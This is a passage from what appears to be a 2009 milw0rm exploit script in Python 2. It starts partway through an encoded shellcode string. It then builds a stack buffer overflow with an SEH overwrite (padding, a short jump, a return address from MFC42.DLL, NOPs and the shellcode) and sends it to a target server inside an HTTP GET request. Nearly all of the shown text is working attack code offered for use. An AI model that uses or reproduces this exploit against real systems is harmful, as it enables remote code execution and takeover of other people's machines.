"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
|
||||
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
|
||||
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
|
||||
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
|
||||
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
|
||||
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
|
||||
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
|
||||
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
|
||||
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
|
||||
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
|
||||
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
|
||||
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
|
||||
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
|
||||
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
|
||||
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
|
||||
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985
|
||||
next_seh = "\xeb\x06\x90\x90"
|
||||
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
|
||||
nops = "\x90" * 10
|
||||
sec = shellcode
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
|
||||
s.close()
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
|
|